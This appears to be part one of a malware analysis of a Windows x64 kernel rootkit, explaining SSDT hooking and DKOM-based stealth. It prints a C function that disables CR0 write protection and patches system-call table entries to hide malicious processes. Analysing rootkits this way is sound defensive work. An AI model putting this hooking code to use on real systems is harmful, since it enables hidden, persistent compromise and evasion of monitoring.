In this initial installment, we dive deep into the mechanics of a sophisticated kernel-mode rootkit recently discovered in the wild. This malware specifically targets Windows x64 environments, utilizing advanced Direct Kernel Object Manipulation (DKOM) techniques to achieve persistent stealth.

Hooking SSDT (System Service Dispatch Table)

The rootkit's primary evasion mechanism involves intercepting system calls. While PatchGuard (KPP) typically prevents arbitrary modification of the SSDT, this particular strain leverages a novel bypass involving a vulnerable driver primitive to flip the necessary bits.

NTSTATUS HookSystemService(ULONG ServiceIndex, PVOID HookFunction, PVOID* OriginalFunction) {
    // Locate the SSDT
    PSYSTEM_SERVICE_TABLE Ssdt = GetKeServiceDescriptorTable();
    if (!Ssdt) return STATUS_UNSUCCESSFUL;

    PULONG ServiceTableBase = (PULONG)Ssdt->ServiceTableBase;

    // Calculate target address (x64 offsets)
    LONG Offset = (LONG)((ULONG_PTR)HookFunction - (ULONG_PTR)ServiceTableBase);

    // Disable Write Protection (CR0) - *DANGEROUS*
    DisableWP();

    // Apply Hook
    *OriginalFunction = (PVOID)((ULONG_PTR)ServiceTableBase + (ServiceTableBase[ServiceIndex] >> 4));
    InterlockedExchange((PLONG)&ServiceTableBase[ServiceIndex], (Offset << 4) | (ServiceTableBase[ServiceIndex] & 0xF));

    EnableWP();
    return STATUS_SUCCESS;
}

By disabling write protection in the CR0 register, the malware briefly opens a window to patch the SSDT pointer. This allows it to redirect execution flow for specific API calls, such as NtQuerySystemInformation, effectively hiding its malicious processes from standard monitoring tools like Task Manager.